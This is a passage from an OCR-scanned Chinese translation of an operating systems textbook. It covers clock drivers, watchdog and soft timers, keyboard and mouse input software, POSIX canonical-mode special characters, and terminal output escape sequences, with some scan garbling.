为 0 时 ， 就 引发 与 链表 中 第 一 个 表 项 相对 应 的 信 
号 ， 并 将 这 一 表 项 从 链表 中 删除 ， 然 后 将 下 一 个 信号 设置 为 现在 处 于 链表 头 的 表 项 的 取 值 ， 在 本 例 中 是 4。 

注意 在 时 钟 中 断 期 间 ， 时 钟 驱动 程序 要 做 几 件 事情 一 “将 实际 时 间 增 1， 将 时 间 片 减 1 并 检查 它 是 否 
为 0， 对 CPU 记 账 ， 以 及 将 报警 计数 器 减 1。 然 而 ， 因 为 这 些 操作 在 每 一 秒 之 中 要 重复 许多 次 ， 所 以 每 个 
操作 都 必须 仔细 地 安排 以 加 快速 度 。 

操作 系统 的 组 成 部 分 也 需要 设置 定时 器 ， 这 些 定时 器 被 称 为 监视 定时 器 (watchdog timer) ©, 例如 ， 
为 了 避免 磨损 介质 和 磁头， 软盘 在 不 使 用 时 是 不 旋转 的 。 当 数据 需要 从 软盘 读 出 时 ， 电 机 必须 首先 启动 。 
只 有 当 软 盘 以 全 速 旋转 时 ，UO 才 可 以 开始 。 当 一 个 进程 试图 从 一 个 空闲 的 软盘 读 取 数 据 时 ， 软 盘 驱动 
程序 启动 电机 然后 设置 一 个 监视 定时 器 以 便 在 足够 长 的 时 间 间隔 之 后 引发 一 个 中 断 (因为 不 存在 来 自 软 
航 本 身 的 达到 速度 的 中 断 )。 

时 钟 虹 动 程序 用 来 处 理 监视 定时 器 的 机 制 和 用 于 用 户 信号 的 机 制 是 相同 的 。 惟 一 的 区 别 是 当 一 个 定 
时 器 时 间 到 时 ， 时 钟 驱动 程序 将 调用 一 个 由 调用 者 提供 的 过 程 ， 而 不 是 引发 一 个 信号 。 这 个 过 程 是 调用 
者 代码 的 一 部 分 。 被 调用 的 过 程 可 以 做 任何 需要 做 的 工作 ， 甚 至 可 以 引发 一 个 中 断 ， 但 是 在 内 核 之 中 中 
上 断 通常 是 不 方便 的 并 且 信 号 也 不 存在 。 这 就 是 为 什么 要 提供 监视 定时 器 机 制 。 值 得 注意 的 是 ， 只 有 当时 
钟 驱动 程序 与 被 调用 的 过 程 处 于 相同 的 地 址 空间 时 ， 监 视 定时 器 宙 制 才 起 作用 。 

时 钟 最 后 要 做 的 事情 是 剖析 (profiling)。 某 些 操作 系统 提供 了 一 种 机 制 ， 通 过 该 机 制 用 户 程序 可 
以 让 系统 构造 它 的 程序 计数 器 的 一 个 直方 图 ， 这 样 它 就 可 以 了 解 时 间 花 在 了 什么 地 方 。 当 剖析 是 可 能 的 
事情 时 ， 在 每 一 时 钟 滴答 驱动 程序 都 要 检查 当前 进程 是 否 正在 被 进行 剖析 ， 如 果 是 ， 则 计算 对 应 于 当前 
程序 计数 器 的 区 间 (ып) OS (一段 地 址 范围 ) ， 然 后 将 该 区 间 的 值 加 1。 这 一 机 制 也 可 用 来 对 系统 本 身 
进行 剖析 。 
5.5.3 软 定时 器 

大 多 数 计算 机 拥有 辅助 可 编程 时 钟 ， 可 以 设置 它 以 程序 需要 的 任何 速率 引发 定时 器 中 上 断 。 该 定时 器 
是 主 系统 定时 器 以 外 的 ， 而 主 系统 定时 器 的 功能 已 经 在 上 面 讲述 了 。 只 要 中 断 频率 比较 低 ， 将 这 个 辅助 定 
时 器 用 于 应 用 程序 特定 的 目的 就 不 存在 任何 问题 。 但 是 当 应 用 程序 特定 的 定时 器 的 频率 非常 高 时， 麻烦 就 
来 了 。 下 面 我 们 将 简要 描述 一 个 基于 软件 的 定时 器 模式 ， 它 在 许多 情况 下 性 能 良好 ， 甚 至 在 相当 高 的 频率 


Ө watchdog timer 也 经 常 译 为 看 门 狗 定时 器 。 译 者 注 

© 直方 图 (histogram) 用 于 描述 随机 变量 取 值 分 布 的 情况 ， 熏 然 在 中 文 术语 中 有 一 个 “图 ” 字 ， 但 并 不 是 必 
须 用 图 形 来 表示 。 它 将 随机 变量 (对 于 本 例 而 言 是 程序 计数 器 的 取 值 ) 的 值 空间 (对 于 本 例 而 言 是 进程 的 
地 址 空间 》 划 分 成 若干 个 小 的 区 间 ， 每 个 小 区 间 就 是 一 个 bin。 通 过 计算 随机 变量 的 取 值 落 在 每 个 小 区 间 内 
的 次 数 就 可 以 得 到 直方 图 。 如 果 用 图 形 表示 直方 图 的 话 则 表现 为 一 系列 高 度 不 等 的 柱状 图 形 。 一 一 详 者 注 
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下 也 是 如 此 。 这 一 思想 起 因 于 (Aron 和 Druschel，1999)。 关 于 更 详细 的 细节 ， 请 参阅 他 们 的 论文 

一 般 而 言 ， 有 两 种 方法 管理 UO: 中 断 和 轮 询 。 中 断 具 有 较 低 的 等 待 时 间 ， 也 就 是 说 ， 它 们 在 事件 
本 身 之 后 立即 发 生 ， 具 有 很 少 的 延迟 或 者 没有 延迟 。 另 一 方面 ， 对 于 现代 CPU 而 言 ， 由 于 需要 上 下 文 切 
换 以 及 对 于 流水 线 、TLB 和 高 速 缓存 的 影响 ， 中 断 具 有 相当 大 的 开销 。 

替代 中 断 的 是 让 应 用 程序 对 它 本 身 期 待 的 事件 进行 轮 询 。 这 样 做 避免 了 中 断 ， 但 是 可 能 存在 相当 长 
的 等 待 时 间 ， 因 为 一 个 事件 可 能 正好 发 生 在 一 次 轮 询 之 后 ,在 这 种 情况 下 它 就 要 等 待 几乎 整个 轮 询 间隔 。 
平均 而 言 ， 等 待 时 间 是 轮 询 间隔 的 一 半 。 

对 于 某 些 应 用 而 言 ， 中 断 的 开销 和 轮 询 的 等 待 时 间 都 是 不 能 接受 的 。 例 如 ， 考 虑 一 个 高 性 能 的 网 络 ， 
如 千 兆 位 以 太 网 。 该 网 络 能 够 每 12ks 接 收 或 者 发 送 一 个 全 长 的 数据 包 。 为 了 以 优化 的 输出 性 能 运行 ， 每 
隔 12hs 就 应 该 发 出 一 个 数据 包 。 

达到 这 一 速率 的 一 种 方法 是 当 一 个 数据 包 传输 完成 时 引发 一 个 中 断 ， 或 者 将 辅助 定时 器 设置 为 每 
12ks 中 断 一 次 。 问 题 是 在 一 个 300 MHz 的 Pentium [I 计算 机 上 该 中 断 经 实测 要 花费 4.45hs 的 时 间 (Aron 
和 Druschel，1999)。 这 样 的 开销 比 20 世 纪 70 年 代 的 计算 机 好 不 了 多 少 。 例 如 ， 在 大 多 数 小 型 机 上 
个 中 断 要 占用 4 个 总 线 周期 :将 程序 计数 器 和 PSW 压 入 堆栈 并 且 加 载 一 个 新 的 程序 计数 器 和 PSW。 现 如 
今 涉及 流水 线 、MMU、TLB 和 高 速 缓存 ,更 是 增加 了 大 量 的 开销 。 这 些 影响 可 能 在 时 间 上 使 情况 变 得 
更 坏 而 不 是 变 得 更 好 ， 因 此 抵消 了 更 快 的 时 钟 速率 。 

软 定时 器 (зой timer) 避免 了 中 断 。 无 论 何 时 当 内 核 因 某 种 其 他 原因 在 运行 时 ， 在 它 返回 到 用 户 态 之 
前 ， 它 都 要 检查 实时 时 钟 以 了 解 软 定时 器 是 否 到 期 。 如 果 这 个 定时 器 已 经 到 期 ， 则 执行 被 调度 的 事件 〈 例 
如 ， 传 送 数据 包 或 者 检查 到 来 的 数据 包 ) ， 而 无 需 切 换 到 内 核 态 ， 因 为 系统 已 经 在 内 核 态 。 在 完成 工作 之 
后 ， 软 定时 器 被 复位 以 便 再 次 闸 响 。 要 做 的 全 部 工作 是 将 当前 时 钟 值 复制 给 定时 器 并 且 将 超时 间隔 加 上 。 

软 定时 器 随 着 因为 其 他 原因 进入 内 核 的 频率 而 脉动 。 这 些 原因 包括 : 

1) 系统 调用 。 

2) TLB 未 命中 。 

3) 页 面 故障 。 

4) UO 中 断 。 

5) CPU 变 成 空闲 。 

为 了 了 解 这 些 事件 发 生得 有 多 频繁 ，Aron 和 Druschel 对 于 几 种 CPU 负载 进行 了 测量 ， 包 括 全 负载 
Web 服 务 器 、 具 有 计算 约束 后 台 作 业 的 Web 服 务 器 、 从 因特网 上 播放 实时 音频 以 及 重 编译 UNIX 内 核 。 进 
人 内 核 的 平均 进入 率 在 2hs 到 1hs 之 间 变 化 ， 其 中 大 约 一 半 是 系统 调用 。 因 此 ， 对 于 一 阶 近似 ， 让 一 个 软 
定时 器 每 隔 2hs 阅 响 一 次 是 可 行 的 ， 虽 然 这 样 做 偶尔 会 错过 最 终 时 限 。 对 于 发 送 数据 包 或 者 轮 询 到 来 的 
数据 包 这 样 的 应 用 而 言 ， 有 时 可 能 晚 10us 比 让 中 断 消 耗 35% 的 CPU 时 间 要 好 。 

当然 ， 可 能 有 一 段 时 间 不 存在 系统 调用 、TLB 未 命中 或 页 面 故 障 ， 在 这 些 情况 下 ， 没 有 软 定时 器 会 
阅 响 。 为 了 在 这 些 时 间 间 隔 上 设置 一 个 最 大 值 ， 可 以 将 辅助 硬件 定时 器 设置 为 每 隔 一 定时 间 (例如 1ms) 
阅 响 一 次 。 如 果 应 用 程序 对 于 偶然 的 时 间 间 隔 能 够 忍受 每 秒 只 有 1000 个 数据 包 ， 那 么 软 定时 器 和 低频 硬 
件 定时 器 的 组 合 可 能 比 纯粹 的 中 断 驱动 O 或 者 纯粹 的 轮 询 要 好 。 


56 用 户 界 面 : 键盘 、 鼠 标 和 监视 器 

每 台 通用 计算 机 都 配 有 一 个 键盘 和 一 个 监视 器 (并 且 通 常 还 有 一 只 鼠标 ) ， 使 人 们 可 以 与 之 交互 。 
尽管 键盘 和 监视 器 在 技术 上 是 独立 的 设备 ， 但 是 它们 紧密 地 一 同 工 作 。 在 大 型 机 上 ， 通 常 存在 许多 远程 
用 户 ， 每 个 用 户 拥有 一 个 设备 ， 该 设备 包括 一 个 键盘 和 一 个 连 在 一 起 的 显示 器 作为 一 个 单位 。 这 些 设备 
在 历史 上 被 称 为 终端 (terminal) 。 人 们 通常 继续 使 用 该 术语 ， 即 便 是 讨论 个 人 计算 机 时 (主要 是 因为 缺 
ZERIE). 


561 输入 软件 

用 户 输入 主要 来 自 键盘 和 鼠标 ， 所 以 我 们 要 了 解 它 们 。 在 个 人 计算 机 上 ， 键 盘 包含 一 个 伐 入 式微 处 
理 器 ， 该 微 处 理 器 通过 一 个 特殊 的 串 行 端口 与 主板 上 的 控制 芯片 通信 (尽管 键盘 越 来 越 多 地 连接 到 USB 
端口 上 )。 每 当 一 个 键 被 按 下 的 时 候 都 会 产生 一 个 中 断 ， 并 且 每 当 一 个 键 被 释放 的 时 候 还 会 产生 第 二 个 
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中 断 。 在 发 生 每 个 这 样 的 键盘 中 断 时 ， 键 盘 驱动 程序 都 要 从 与 键盘 相关 联 的 LO 端口 提取 信息 ， 以 了 解 
发 生 了 什么 事情 。 其 他 的 一 切 事情 都 是 在 软件 中 发 生 的 ， 在 相当 大 的 程度 上 独立 于 硬件 。 

当 想 象 往 shell 窗 口 (命令 行 界面 ) 键入 命令 时 ， 可 以 更 好 地 理解 本 小 节余 下 的 大 部 分 内 容 。 这 是 程 
序 员 通常 的 工作 方式 。 我 们 将 在 下 面 讨论 图 形 界面 。 

1. 键盘 软件 

IO 端口 中 的 数字 是 键 编 号 ， 称 为 扫描 码 (scan code) ， 而 不 是 ASCII 码 。 键 盘 所 拥有 的 键 不 超过 128 
个 ， 所 以 只 需 7 个 位 表示 键 编号 。 当 键 按 下 时 ， 第 8 位 设置 为 0， 当 键 释放 时 ， 第 8 位 设置 为 1。 跟 踪 每 个 
MORE 〈 按 下 或 弹 起 ) 是 驱动 程序 的 任务 。 

例如 ， 当 A 键 被 按 下 时 ， 扫 描 码 (30) 被 写 入 一 个 IO 寄存 器 。 驱 动 程序 应 该 负责 确定 键入 的 是 小 写 
字母 、 大 写字 母 、CTRL-A、ALTA、CTRL-ALT-A 还 是 某 些 其 他 组 合 。 由 于 驱动 程序 可 以 断定 哪些 键 
已 经 按 下 但 是 还 没有 被 释放 (例如 SHIFT) ， 所 以 它 拥有 足够 多 的 信息 来 做 这 一 工作 。 

例如 ， 击 键 序列 

按 下 SHIFT， 按 下 A， 释 放 A， 释 放 SHIFT 
指示 的 是 大 写字 母 A。 然 而 击 键 序列 

按 下 SHIFT， 按 下 A， 释 放 SHIFT， 释放 A 
指示 的 也 是 大 写字 母 A。 尽 管 该 键盘 接口 将 所 有 的 负担 都 加 在 软件 上 ， 但 是 却 极其 灵活 。 例 如 ， 用 户 程 
序 可 能 对 刚刚 键入 的 一 个 数字 是 来 自 顶端 的 一 排 键 还 是 来 自 边 上 的 数字 键盘 感 兴趣 。 原 则 上 ， 驱动 程序 
能 够 提供 这 一 信息 

键盘 驱动 程序 可 以 采纳 两 种 可 能 的 处 理 方法 。 在 第 一 种 处 理 方法 中 ， 驱动 程序 的 工作 只 是 接收 输入 
并 且 不 加 修改 地 向 上 层 传送 。 这 样 ， 从 键盘 读数 据 的 程序 得 到 的 是 ASCII 码 的 原始 序列 。 (向 用 户 程序 提 
供 扫描 码 过 于 原始 ， 并 且 高 度 地 依赖 于 机 器 。) 

这 种 处 理 方法 非常 适合 于 像 emacs 那 样 的 复杂 屏幕 编辑 器 的 需要 ， 它 允 许 用 户 对 任意 字符 或 字符 序 
列 施加 任意 的 动作 。 然 而 ， 这 意味 着 如 果 用 户 键入 的 是 dste 而 不 是 date， 为 了 修改 错误 而 键入 三 个 退 格 
键 和 ate， 然 后 是 一 个 回 车 健 ， 那 么 提供 给 用 户 程序 的 是 键入 的 全 部 11 个 ASCII 码 ， 如 下 所 示 : 

dste— 一 一 ate CR 


并 非 所 有 的 程序 都 想 要 这 么 多 的 细节 ， 它 们 常常 只 想 要 校正 后 的 输入 ， 而 不 是 如 何 产生 它 的 准确 的 
序列 。 这 一 认识 导致 了 第 二 种 处 理 方法 : 键盘 驱动 程序 处 理 全 部 行内 编辑 ， 并 且 只 将 校正 后 的 行 传送 给 
用 户 程序 。 第 一 种 处 理 方法 是 面向 字符 的 ， 第 二 种 处 理 方法 是 面向 行 的 。 最 初 它们 分 别 被 称 为 原始 模式 
(raw mode) 和 加 工 模式 (cooked mode)。POSIX 标 准 使 用 稍 欠 生动 的 术语 规范 模式 (canonical тойс) Ж 
描述 面向 行 的 模式 。 非 规范 模式 (noncanonical mode) 与 原始 模式 是 等 价 的 ， 尽管 终端 行为 的 许多 细节 可 
能 被 修改 了 。POSIX 兼 容 的 系统 提供 了 若干 库 函 数 ， 支持 选择 这 两 种 模式 中 的 一 种 并 且 修改 许多 参数 。 

如 果 键 盘 处 于 规范 〈 加 工 ) 模式 ， 则 字符 必须 存储 起 来 直到 积累 完整 的 一 行 ， 因为 用 户 随 后 可 能 决 
定 删除 一 行 中 的 一 部 分 。 即 使 键盘 处 于 原始 模式 ， 程 序 也 可 能 尚未 请 求 输入 ， 所 以 字符 也 必须 缓冲 起 来 
以 便 人 允许 用 户 提前 键入 。 可 以 使 用 专用 的 缓冲 区 ， 或 者 缓冲 区 也 可 以 从 池 中 分 配 。 前 者 对 提前 键入 提出 
了 固定 的 限制 ， 后 者 则 没有 。 当 用 户 在 shell 窗 口 (Windows 的 命令 行 窗口 ) 中 击 键 并 且 刚刚 发 出 一 条 尚 
未 完成 的 命令 (例如 编译 ) 时 ， 将 引起 尖锐 的 问题 。 后 继 键入 的 字符 必须 被 缓冲 ， 因为 shell 还 没有 准备 
好 读 它们 。 那 些 不 允许 用 户 提前 键入 的 系统 设计 者 应 该 被 涂 柏油 、 粘 羽毛 ， 或 者 更 加 严重 的 惩罚 是 ， 
强迫 他 们 使 用 他 们 自己 设计 的 系统 。 

虽然 键盘 与 监视 器 在 逻辑 上 是 两 个 独立 的 设备 ， 但 是 很 多 用 户 已 经 习惯 于 看 到 他 们 刚刚 键入 的 字符 
出 现在 屏幕 上 。 这 个 过 程 叫做 回 显 (echoing)。 

当 用 户 正在 击 键 的 时 候 程序 可 能 正在 写 屏 幕 ， 这 一 事实 使 回 显 变 得 错综复杂 (请 再 一 次 想象 在 shell 


Ө 原文 为 be tarred and feathered， 是 英国 古代 的 一 种 酷刑 。 受 刑 人 全 身 涂 上 灼热 的 柏油 (tarred), ， 然 后 将 其 身 
EHHE (feathered)。 这 样 ， 羽 毛 当然 很 难 脱 下 ， 要 脱 下 也 难免 皮肉 之 伤 。be tarred and feathered 现 用 
于 比喻 受到 严厉 惩罚 。 译 者 注 
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窗口 中 击 键 )。 最 起 码 ， 键 盘 驱 动 程序 必须 解决 在 什么 地 方 放置 新 键入 的 字符 而 不 被 程序 的 输出 所 覆盖 。 

当 超过 80 个 字符 必须 在 具有 80 字 符 行 ( 或 某 个 其 他 数字 ) 的 窗口 中 显示 时 ,也 使 回 显 变 得 错综复杂 。 
根据 应 用 程序 ， 折 行 到 下 一 行 可 能 是 适宜 的 。 某 些 驱动 程序 只 是 通过 丢弃 超出 80 列 的 所 有 字符 而 将 每 行 
截断 到 80 个 字符 。 

另 一 个 问题 是 制 表 符 的 处 理 。 通 常 由 驱动 程序 来 计算 光标 当前 定位 在 什么 位 置 ， 它 既 要 考虑 程序 的 
输出 又 要 考虑 回 显 的 输出 ， 并 且 要 计算 要 回 显 的 正确 的 空格 个 数 。 

现在 我 们 讨论 设备 等 效 性 问题 。 逻 辑 上 ， 在 一 个 文本 行 的 结尾 ， 人 们 需要 一 个 回 车 和 一 个 换行 ， 回 
车 使 光标 移 回 到 第 一 列 ， 换 行使 光标 前 进 到 下 一 行 。 要 求 用 户 在 每 一 行 的 结尾 键入 回 车 和 换行 是 不 受 欢 
迎 的 。 这 就 要 求 驱动 程序 将 输入 转化 成 操作 系统 使 用 的 格式 。 在 UNIX 中 ，ENTER 键 被 转换 成 一 个 换行 
用 于 内 部 存储 ， 而 在 Windows 中 ， 它 被 转换 成 一 个 回 车 跟随 一 个 换行 。 

如 果 标 准 形式 只 是 存储 一 个 换行 UNIX 约定 ) ， 那 么 回 车 (由 Enter 键 造成 ) 应 该 转换 为 换行 。 如 
果 内 部 格式 是 存储 两 者 (Windows 约 定 ) ， 那 么 驱动 程序 应 该 在 得 到 回 车 时 生成 一 个 换行 并 且 在 得 到 换 


行 时 生成 一 个 同 车 。 不 管 是 什么 内 部 约定 ， [字符 POSE к=н 

监视 器 可 能 要 求 换行 和 回 车 两 者 都 回 显 ， ORCH | ERASE жй СЕТ = 

以 便 正确 地 更 新 屏幕 。 在 诸如 大 型 计算 机 ereu кп. ТҮТТҮ | 

这 样 的 多 用 户 系统 上 ， 不 同 的 用 户 可 能 拥 [CRLV | LNEXT 按 字面 起 义 解释 下 一 个 字符 

有 不 同类 型 的 终端 连接 到 大 型 计算 机 上 ， [CTRLS | STOP 停止 输出 

这 就 要 求 键盘 驱动 程序 将 所 有 不 同 的 回 车 / | CTRLQ | START 开始 输出 

换行 组 合 转换 成 内 部 系统 标准 并 且 安排 好 | DEL | INTR 中 断 进程 (SIGINT) 

正确 地 实现 回 显 。 | CTRLA | QUIT 强制 核心 转 储 (SIGQUIT) | 
在 规范 模式 下 操作 时 ， 许 多 输入 字符 ”|_CTRL-D | EOF 文件 结尾 

有 具有 特殊 的 含义 。 图 5-35 显 示 出 了 POSIX 要 | СТКІ-М | CR 回 车 (不 可 修改 的 ) 

求 的 所 有 特殊 字符 。 默 认 的 是 所 有 控制 字 | CTRL | NL - 换行 (不 可 修改 的 ) _ 

符 ， 这 些 控制 字符 应 该 不 与 程序 所 使 用 的 图 5-35 在 规范 模式 下 特殊 处 理 的 字符 


文本 输入 或 代码 相 冲突 ， 但 是 除了 最 后 两 
个 以 外 所 有 字符 都 可 以 在 程序 的 控制 下 修改 。 

ERASE 字 符 双 许 用 户 删除 刚刚 键入 的 字符 。 它 通常 是 退 格 符 (CTRL+H) 。 它 并 不 添加 到 字符 队列 
中 ， 而 是 从 队列 中 删除 前 一 个 字符 。 它 应 该 被 回 显 为 三 个 字符 的 序列 ， 即 退 格 符 、 空 格 和 退 格 符 ， 以 便 
从 屏幕 上 删除 前 一 个 字符 。 如 果 前 一 个 字符 是 制 表 符 ， 那么 删除 它 取决 于 当 它 被 键入 的 时 候 是 如 何 处 理 
的 。 如 果 制 表 符 直 接 展开 成 空格 ， 那 么 就 需要 某 些 额外 的 信息 来 决定 后 退 多 远 。 如 果 制 表 符 本 身 被 存放 
在 输入 队列 中 ， 那么 就 可 以 将 其 删除 并 且 重 新 输出 整 行 。 在 大 多 数 系统 中 ， 退 格 只 删除 当前 行 上 的 字符 ， 
不 会 删除 回 车 并 且 后 退 到 前 一 行 。 

当 用 户 注意 到 正在 键入 的 一 行 的 开头 有 一 个 错误 时 ， 擦 除 一 整 行 并 且 从 头 再 来 常常 比较 方便 。 
KILL 字 符 擦 除 一 整 行 。 大 多 数 系统 使 被 擦 除 的 行 从 屏幕 上 消失 ， 但 是 也 有 少数 古老 的 系统 回 显 该 行 并 
且 加 上 一 个 回 车 和 换行 ， 因 为 有 些 用 户 喜欢 看 到 旧 的 一 行 。 因 此 ， 如 何 回 显 KILL 是 个 人 喜好 问题 。 与 
ERASE 一 样 ，KILL 通 常 也 不 可 能 从 当前 行进 一 步 回 退 。 当 一 个 字符 块 被 删除 时 ， 如 果 使 用 了 缓冲 ， 那 
么 烦 劳 驱动 程序 将 缓冲 区 退还 给 缓冲 池 可 能 值得 做 也 可 能 不 值得 做 。 

有 时 ERASE 或 KILL 字 符 必 须 作为 普通 的 数据 键入 。 LNEXT 字 符 用 作 一 个 转 AFH (escape character), 
在 UNIX 中 ，CTRL + V 是 默认 的 转 义 字符 。 例 如 ， 更 加 古老 的 UNIX 系 统 常常 使 用 @ 作 为 KILL 字 符 ， 但 是 
因特网 邮件 系统 使 用 linda@cs.washington edu 形 式 的 地 址 。 有 的 人 觉得 老式 的 约定 更 加 舒服 从 而 将 KILL 重 
定义 为 @， 但 是 之 后 又 需要 按 字面 意义 键 和 人 一 个 @ 符 号 到 电子 邮件 地 址 中 。 这 可 以 通过 键入 CTRL+V @ 
来 实现 。CTRL+V 本 身 可 以 通过 键入 CTRL+V CTRL+V 而 按 字面 意义 键入 。 看 到 一 个 CTRL+V 之 后 ， 驱 
动 程序 设置 一 个 标志 ， 表 示 下 一 字符 免除 特殊 处 理 。LNEXT 字 符 本 身 并 不 进入 字符 队列 。 

为 了 让 用 户 阻 止 屏 幕 图 像 滚动 出 视线 ， 提 供 了 控制 码 以 便 冻 结 屏 幕 并 且 之 后 重新 开始 滚动 。 在 
UNIX 系 统 中 ， 这 些 控制 码 分 别 是 STOP (CTRL+S) 和 START (CTRL+Q)。 它 们 并 不 被 存储 ， 只 是 用 
来 设置 或 清除 键盘 数据 结构 中 的 一 个 标志 。 每 当 试图 输出 时 ， 就 检查 这 个 标志 。 如 果 标 志 已 设置 ， 则 不 
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输出 。 通 常 ， 回 显 也 随 程序 输出 一 起 被 抑制 。 

杀 死 一 个 正在 被 调试 的 失控 程序 经 常 是 有 必要 的 ，INTR (DEL) 和 QUIT (CTRL+\) 字符 可 以 用 
于 这 一 目的 。 在 UNIX 中 ，DEL 将 SIGINT 信 号 发 送 到 从 该 键盘 启动 的 所 有 进程 。 实 现 DEL 是 相当 需要 技 
巧 的 ， 因 为 UNIX 从 一 开始 就 被 设计 成 在 同一 时 刻 处 理 多 个 用 户 。 因 此 ， 在 一 般 情况 下 ， 可 能 存在 多 个 
进程 代表 多 个 用 户 在 运行 ， 而 DEL 键 必须 只 能 向 用 户 自己 的 进程 发 信号 。 困 难 之 处 在 于 从 驱动 程序 获得 
信息 送 给 系统 处 理 信号 的 那 部 分 ， 后 者 毕竟 还 没有 请 求 这 个 信息 。 

CTRL+\ 与 DEL 相 类 似 ， 只 是 它 发 送 的 是 SIGQUIT 信 号 ， 如 果 这 个 信号 没有 被 捕 所 到 或 被 忽略， 则 
强迫 进行 核心 转 储 。 当 敲 击 这 些 键 中 的 任意 一 个 键 时 ， 驱 动 程序 应 该 回 显 一 个 回 车 和 换行 并 且 为 了 全 新 
的 开始 而 放弃 累积 的 全 部 输入 。INTR 的 默认 值 经 常 是 CTRL+C 而 不 是 DEL， 因 为 许多 程序 针对 编辑 操 
作 可 互 换 地 使 用 DEL 与 退 格 符 。 

另 一 个 特殊 字符 是 EOF (CTRL+D)。 在 UNIX 中 ， 它 使 任何 一 个 针对 该 终端 的 未 完成 的 读 请 求 以 组 
冲 区 中 可 用 的 任何 字符 来 满足 ， 即 使 缓冲 区 是 空 的 。 在 一 行 的 开头 键 和 CTRL+D 将 使 得 程序 读 到 0 个 字 
节 ， 按 惯例 该 字符 被 解释 为 文件 结尾 ， 并 且 使 大 多 数 程序 按照 它们 在 处 理 输入 文件 时 遇 到 文件 结尾 的 同 
样 方法 对 其 进行 处 理 。 

2. 鼠标 软件 

大 多 数 PC 机 具有 一 个 鼠标 ， 或 者 具有 一 个 跟踪 球 ， 跟 踪 球 不 过 是 躺 在 其 背部 上 的 鼠标 。 一 种 常见 
类 型 的 鼠标 在 内 部 具有 一 个 橡皮 球 ， 该 橡皮 球 通过 鼠标 底部 的 一 个 圆 洞 突出 ， 当 鼠标 在 一 个 粗糙 表面 上 
移动 时 橡皮 球 会 随 着 旋转 。 当 橡皮 球 旋转 时 ， 它 与 放置 在 相互 垂直 的 滚 轴 上 的 两 个 橡皮 滚 简 相 摩擦 。 东 
西方 向 的 运动 导致 平行 于 y 轴 的 滚 轴 旋 转 ， 南 北方 向 的 运动 导致 平行 于 x 轴 的 滚 轴 旋 转 。 

另 一 种 流行 的 鼠标 类 型 是 光学 鼠标 ， 它 在 其 底部 装备 有 一 个 或 多 个 发 光 二 极 管 和 光电 探测 器 。 早 期 的 
光学 鼠标 必须 在 特殊 的 鼠标 垫上 操作 ， 鼠 标 垫上 刻 有 和 矩形 的 网 格 ， 这 样 鼠 标 能 够 计数 穿 过 的 线 数 。 现 代 光 
学 鼠标 在 其 中 有 图 像 处 理 芯片 并 且 获取 处 于 它们 下 方 的 连续 的 低 分 辨 率 照 片 ， 寻 找 从 图 像 到 图 像 的 变化 。 

当 鼠 标 在 随便 哪个 方向 移动 了 一 个 确定 的 最 小 距离 ， 或 者 按钮 被 按 下 或 释放 时 ， 都 会 有 一 条 消息 发 
送 给 计算 机 。 最 小 距离 大 约 是 0.1mm (尽管 它 可 以 在 软件 中 设置 )。 有 些 人 将 这 一 单位 称 为 一 个 鼠标 步 
(mickey)。 鼠 标 可 能 具有 一 个 、 两 个 或 者 三 个 按钮 ， 这 取决 于 设计 者 对 于 用 户 跟踪 多 个 按钮 的 智力 的 估 
计 。 某 些 鼠 标 具 有 滚轮 ， 可 以 将 额外 的 数据 发 送 回 计算 机 。 无 线 鼠 标 与 有 线 鼠 标 相同 ， 区 别 是 无 线 昭 标 
使 用 低 功率 无 线 电 ， 例 如 使 用 昔 牙 (Bluetooth) 标准 将 数据 发 送 回 计算 机 ， 而 有 线 鼠 标 是 通过 导线 将 数 
据 发 送 回 计算 机 。 

发 送 到 计算 机 的 消息 包含 三 个 项 目 ，Ar、Ay、 按 钮 ， 即 自 上 一 次 消息 之 后 x 位 置 的 变化 、 自 上 一 次 
消息 之 后 y 位 置 的 变化 、 按 钮 的 状态 。 消 息 的 格式 取决 于 系统 和 鼠标 所 具有 的 按钮 的 数目 。 通 常 ， 消 息 
占 3 字 节 。 大 多 数 鼠 标 返回 报告 最 多 每 秒 40 次 ， 所 以 鼠标 自 上 一 次 报告 之 后 可 能 移动 了 多 个 鼠标 步 。 

注意 ， 鼠 标 仅仅 指出 位 置 上 的 变化 ， 而 不 是 绝对 位 置 本 身 。 如 果 轻 轻 地 拿 起 鼠标 并 且 轻 轻 地 才 下 而 
不 导致 橡皮 球 旋转 ， 那 么 就 不 会 有 消息 发 出 。 

某 些 GUI 区 分 单 击 与 双击 鼠标 按钮 。 如 果 两 次 点 击 在 空间 上 (鼠标 步 ) 足够 接近 ， 并 且 在 时 间 上 
(EH) 也 足够 接近 ， 那 么 就 会 发 出 双击 信号 。 最 大 的 “足够 接近 ”是 软件 的 事情 ， 并 且 这 两 个 参数 通 
常 是 用 户 可 设置 的 。 


5.6.2 输出 软件 

下 面 我 们 考虑 输出 软件 。 首 先 我 们 将 讨论 到 文本 窗口 的 简单 输出 ， 这 是 程序 员 通常 喜欢 使 用 的 方式 。 
然后 ， 我 们 将 考虑 图 形 用 户 界面 ， 这 是 其 他 用 户 经 常 喜欢 使 用 的 。 

І. 文本 窗口 

当 输 出 是 连续 的 单一 字体 、 大 小 和 颜色 的 形式 时 ， 输 出 比 输入 简单 。 大 体 上 ， 程 序 将 字符 发 送 到 当 
前 窗口 ， 而 字符 在 那里 显示 出 来 。 通 常 ， 一 个 字符 块 或 者 一 行 是 在 一 个 系统 调用 中 被 写 到 窗口 上 的 。 

屏 蔬 编 辑 器 和 许多 其 他 复杂 的 程序 需要 能 够 以 更 加 复杂 的 方式 更 新 屏幕 ， 例 如 在 屏幕 的 中 间 赫 换 一 
行 。 为 满足 这 样 的 需要 ， 大 多 数 输 出 驱动 程序 支持 一 系列 命令 来 移动 光标 ， 在 光标 处 插入 或 者 删除 字符 
或 行 。 这 些 命令 常常 被 称 为 转 义 序列 escape sequence)。 在 25 行 80 列 ASCII 呈 终端 的 全 盛 期 ， 有 数 百 种 终 
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端 类 型 ， 每 一 种 都 有 自己 的 转 义 序列 。 因 而 ， 编 写 在 一 种 以 上 的 终端 类 型 上 工作 的 软件 是 十 分 困难 的 。 

一 种 解决 方案 是 称 为 termcap 的 终端 数据 库 ， 它 是 在 伯克利 UNIX 中 引入 的 。 该 软件 包 定义 了 许多 基 
本 动作 ， 例 如 将 光标 移动 到 〈 行 ， 列 ) 。 为 了 将 光标 移动 到 一 个 特殊 的 位 置 ， 软 件 (如 一 个 编辑 器 ) 使 
用 一 个 一 般 的 转 义 序列 ， 然 后 该 转 义 序列 被 转换 成 将 要 被 执行 写 操作 的 终端 的 实际 转 义 序列 。 以 这 种 方 
